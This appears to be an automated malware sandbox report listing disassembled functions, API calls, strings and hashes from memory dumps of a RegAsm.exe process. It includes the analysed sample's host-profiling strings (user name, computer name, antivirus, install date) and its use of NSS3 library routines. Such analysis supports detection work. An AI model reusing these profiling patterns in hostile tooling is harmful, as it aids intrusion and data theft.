Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: __allrem
String ID: @&l$P&l$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$&l
API String ID: 2933888876-3102866996
Opcode ID: eae35b32af2c3797ff6ae80b96641f01d094d1370e2968f62ac1e41c10e02d2a
Instruction ID: 16d569c22700e890d039d5ed7d02c64bd187a67ee4c81953b3614c9aefaf4ae4
Opcode Fuzzy Hash: eae35b32af2c3797ff6ae80b96641f01d094d1370e2968f62ac1e41c10e02d2a
Instruction Fuzzy Hash: E1619E71B002099FDB04CF68D898AAA77B1FF49314F108528ED15EB7D0DB35AD46CB91

Function 0041B8EA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,00000000,?,01302528), ref: 0041B91E
GetFileSize.KERNEL32(?,00000000), ref: 0041B997
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041B9B3
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041B9C7
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041B9D0
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041B9E0
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041B9FE
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BA0E

Strings

, xrefs: 0041B96A

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: 5baf51b2588bdecfe3558ed95e9e9b23d89f03684e3faa6140ed0d6073882032
Instruction ID: d7b1e0aa4d9806dd075c8cdea4914c0bdc5e250a901ed3b08a6442dad41292ef
Opcode Fuzzy Hash: 5baf51b2588bdecfe3558ed95e9e9b23d89f03684e3faa6140ed0d6073882032
Instruction Fuzzy Hash: A351E5B1D0021CAFDB28DF99DD81AEEBBB9EF44344F10442AE515E6260D7389D85CF94

Function 6C0D2400 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6C0D24EC
sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6C0D2315), ref: 6C0D254F
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6C0D2315), ref: 6C0D256C

Strings

misuse, xrefs: 6C0D2561
bind on a busy prepared statement: [%s], xrefs: 6C0D24E6
API called with finalized prepared statement, xrefs: 6C0D2543, 6C0D254D
API called with NULL prepared statement, xrefs: 6C0D253C
%s at line %d of [%.10s], xrefs: 6C0D2566
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C0D24F4, 6C0D2557

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
API String ID: 632333372-2222229625
Opcode ID: a7cbf6a37322d7d2dab524874eba6bbc707f884e614748266275c0baa1794dc6
Instruction ID: c6ad02b420c92a5dd7620e9ab2555a2846ff55456a2291fa4e7965dfe9abcd40
Opcode Fuzzy Hash: a7cbf6a37322d7d2dab524874eba6bbc707f884e614748266275c0baa1794dc6
Instruction Fuzzy Hash: 6E41EF717047048BE7149F19E8A8B6B77E6AF8531AF16492CEC054BB80DB36FC46CB91

Function 6C0D6600 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 95COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,NULL), ref: 6C0D6C66
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0001F490,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C0D6C83

Strings

API call with %s database connection pointer, xrefs: 6C0D6C60
NULL, xrefs: 6C0D6C55, 6C0D6C5F
misuse, xrefs: 6C0D6C78
unopened, xrefs: 6C0D6C9F
%s at line %d of [%.10s], xrefs: 6C0D6C7D
invalid, xrefs: 6C0D6C95
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C0D6C6E

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$NULL$invalid$misuse$unopened
API String ID: 632333372-4248800309
Opcode ID: 1e3eddaa8a69ace4709e8ab89a8edc233d8219801c47794ce6e431132bae97cd
Instruction ID: ddca6e4af6c39c999db780c67ac95ebfef1466876a80ec65c119e315f8d7d5fb
Opcode Fuzzy Hash: 1e3eddaa8a69ace4709e8ab89a8edc233d8219801c47794ce6e431132bae97cd
Instruction Fuzzy Hash: 89315871B043089BDB00CE6A9C917AB77E5EB45328F564928DD28DBBC0DB30B84987D1

Function 00411563 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
ReleaseDC.USER32(00000000,00000000), ref: 00411596
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00413FF0,?,Display Resolution: ,004368E8,00000000,User Name: ,004368D8,00000000,Computer Name: ,004368C4,AV: ,004368B8), ref: 004115A2
HeapAlloc.KERNEL32(00000000,?,?,00413FF0,?,Display Resolution: ,004368E8,00000000,User Name: ,004368D8,00000000,Computer Name: ,004368C4,AV: ,004368B8,Install Date: ), ref: 004115A9
wsprintfA.USER32 ref: 004115BB

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Strings

|hC, xrefs: 004115AF
%dx%d, xrefs: 004115B5

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d$|hC
API String ID: 3940144428-2932932255
Opcode ID: 57ea36ef517c06c2be2c73f86027357596ecdcad2e6481f61c35efa9a20952fe
Instruction ID: 0a252f2f445db60877cb7c416ed6b923e952b0d72733192e60c422f3fab72388
Opcode Fuzzy Hash: 57ea36ef517c06c2be2c73f86027357596ecdcad2e6481f61c35efa9a20952fe
Instruction Fuzzy Hash: 41F0AF72601320BBD720ABA5AC0DD9B7EADEF46AA6F001011F606E21A0C6B54C4087A1

Function 6C156DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C157D8F,6C157D8F,?,?), ref: 6C156DC8

Part of subcall function 6C1AFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C1AFE08
Part of subcall function 6C1AFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C1AFE1D
Part of subcall function 6C1AFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C1AFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C157D8F,?,?), ref: 6C156DD5

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C278FA0,00000000,?,?,?,?,6C157D8F,?,?), ref: 6C156DF7

Part of subcall function 6C1AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2818D0,?), ref: 6C1AB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C156E35

Part of subcall function 6C1AFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C1AFE29
Part of subcall function 6C1AFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C1AFE3D
Part of subcall function 6C1AFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C1AFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C156E4C

Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C278FE0,00000000), ref: 6C156E82

Part of subcall function 6C156AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C15B21D,00000000,00000000,6C15B219,?,6C156BFB,00000000,?,00000000,00000000,?,?,?,6C15B21D), ref: 6C156B01
Part of subcall function 6C156AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C156B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C156F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C156F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C278FE0,00000000), ref: 6C156F6B
PR_SetError.NSS3(FFFFE005,00000000,6C157D8F,?,?), ref: 6C156FE1

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: a06c086df9b612dd6d70ca4f47554eae0ca53fd3cf9cd2cba6905cda3c0e0431
Instruction ID: 8d6c3bafcea4a470b5f4b045442d5fb6842a206a31bad45be93aaa5f276fbb01
Opcode Fuzzy Hash: a06c086df9b612dd6d70ca4f47554eae0ca53fd3cf9cd2cba6905cda3c0e0431
Instruction Fuzzy Hash: 5971A0B1E1024A9FDB00CF55CD50BAAB7A4BF64308F554266E828D7B11F731E9A4CBD0

Function 6C19ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE10
EnterCriticalSection.KERNEL32(?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C17D079,00000000,00000001), ref: 6C19AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE7F
TlsGetValue.KERNEL32(?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AEF1
free.MOZGLUE(6C17CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C17CDBB,?), ref: 6C19AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AF30

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 6c36f1de36ab4b165ea5e6830a0da336518d0d18dba0faedec391c4738e6ee00
Instruction ID: 93a6d4648d2a0c20d1a0039344758ca4a606634b3831f409d93b4feb9e127cd2
Opcode Fuzzy Hash: 6c36f1de36ab4b165ea5e6830a0da336518d0d18dba0faedec391c4738e6ee00
Instruction Fuzzy Hash: F7516DB1E00602AFDB059F29D884B6AB7B4BF15318F144664EC1997A51E731F8A8CBD1

Function 6C174CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C17AB7F,?,00000000,?), ref: 6C174CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C17AB7F,?,00000000,?), ref: 6C174CC8
TlsGetValue.KERNEL32(?,6C17AB7F,?,00000000,?), ref: 6C174CE0
EnterCriticalSection.KERNEL32(?,?,6C17AB7F,?,00000000,?), ref: 6C174CF4
PL_HashTableLookup.NSS3(?,?,?,6C17AB7F,?,00000000,?), ref: 6C174D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C174D10

Part of subcall function 6C1FDD70: TlsGetValue.KERNEL32 ref: 6C1FDD8C
Part of subcall function 6C1FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDDB4

PR_Now.NSS3(?,00000000,?), ref: 6C174D26

Part of subcall function 6C219DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DC6
Part of subcall function 6C219DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DD1
Part of subcall function 6C219DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C219DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C174D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C174DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C174E02

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: ae38114c7d7e9f479f4ab606cc64d24500a5e4349143ee29ee93325866698fad
Instruction ID: f0d1e58995f3a3e4f5c6661a992e19262b2fd8b959b883cf286fcd96dbca9b39
Opcode Fuzzy Hash: ae38114c7d7e9f479f4ab606cc64d24500a5e4349143ee29ee93325866698fad
Instruction Fuzzy Hash: B241E7B59002059BEB10AF69EC44A6A77B8EF2525CF054170EC18C7B51FB31D964CBF2

Function 6C152E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C152CDA,?,00000000), ref: 6C152E1E

Part of subcall function 6C1AFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C159003,?), ref: 6C1AFD91
Part of subcall function 6C1AFD80: PORT_Alloc_Util.NSS3(A4686C1B,?), ref: 6C1AFDA2
Part of subcall function 6C1AFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C1B,?,?), ref: 6C1AFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C152E33

Part of subcall function 6C1AFD80: free.MOZGLUE(00000000,?,?), ref: 6C1AFDD1

TlsGetValue.KERNEL32 ref: 6C152E4E
EnterCriticalSection.KERNEL32(?), ref: 6C152E5E
PL_HashTableLookup.NSS3(?), ref: 6C152E71
PL_HashTableRemove.NSS3(?), ref: 6C152E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C152E96
PR_Unlock.NSS3 ref: 6C152EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C152EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C152EC5

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 4ed9725cfb15f980dfe5b38e85505ba1e4ea362cd646136bf7052afcfcd58381
Instruction ID: 08ce60b2b6af7fb532fe222c826f35a7592d68f06879a008b53cda60fffe1d26
Opcode Fuzzy Hash: 4ed9725cfb15f980dfe5b38e85505ba1e4ea362cd646136bf7052afcfcd58381
Instruction Fuzzy Hash: 162104B6B00201A7EF015B68EC0DB9B3A79EB6235DF054830ED2892751FB32D569D7A1

Function 0040DB7F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0040DBBB
strchr.MSVCRT ref: 0040DBCD
strchr.MSVCRT ref: 0040DBF2
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
strcpy_s.MSVCRT ref: 0040DC6F

Strings

0123456789ABCDEF, xrefs: 0040DB99

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
String ID: 0123456789ABCDEF
API String ID: 453150750-2554083253
Opcode ID: 479fc24d48d239388ff27c9940830e116c67b26333634cc4c9501800c50fc5a6
Instruction ID: 4fdc6daf8f098c1097e033ecf5ebd27a47bf054313386d26b8b482d0778e38fb
Opcode Fuzzy Hash: 479fc24d48d239388ff27c9940830e116c67b26333634cc4c9501800c50fc5a6
Instruction Fuzzy Hash: F8313E71D002199FDB10DFE8DC45ADEBBB9AF09355F100179E901FB281DB79A909CB94

Function 0041F8A2 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 0041F8C7

Part of subcall function 0041F462: Replicator::operator[].LIBCMT ref: 0041F4E5
Part of subcall function 0041F462: DName::operator+=.LIBCMT ref: 0041F4ED

DName::operator+.LIBCMT ref: 0041F920
DName::DName.LIBCMT ref: 0041F978

Strings

void, xrefs: 0041F970
..., xrefs: 0041F95B, 0041F967
,..., xrefs: 0041F90C, 0041F918
<ellipsis>, xrefs: 0041F962
,<ellipsis>, xrefs: 0041F913

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: 4d0e37cbe1a8a9f77338e282b8db12bd570ff5ab5a01f3e75f752cd01befcb9d
Instruction ID: 5e4881cd0f30a83efa02c33c58cf491b5ca9e06ca96eb83012f45673168a44f5
Opcode Fuzzy Hash: 4d0e37cbe1a8a9f77338e282b8db12bd570ff5ab5a01f3e75f752cd01befcb9d
Instruction Fuzzy Hash: B021B371200344AFCB05DF1CE884AE9BBF1EB0535AB448066E846DB366C738E987CB48

Function 0042123B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 00421245
